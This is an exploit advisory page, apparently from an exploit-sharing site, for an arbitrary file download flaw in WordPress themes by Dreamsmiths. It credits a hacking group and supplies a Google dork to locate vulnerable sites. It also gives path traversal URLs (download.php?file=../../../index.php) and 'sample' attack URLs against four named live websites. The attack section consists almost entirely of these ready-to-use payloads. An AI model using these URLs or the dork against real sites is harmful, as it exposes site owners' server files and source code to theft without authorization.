WordPress Dreamsmiths Themes 0.0.1 Arbitrary File Download

2018.08.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download # Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/ # Date: 2018/01/08 # Exploit Author: IRaNHaCK Security Team # Vendor Homepage: iranhack.com # Software Link: http://www.dreamsmiths.com/ # Version: 0.0.1 # Tested on: 7 , KAli P0c: Arbitrary Download PHP File in all WordPress themes By dreamsmiths : site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php Sample: https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top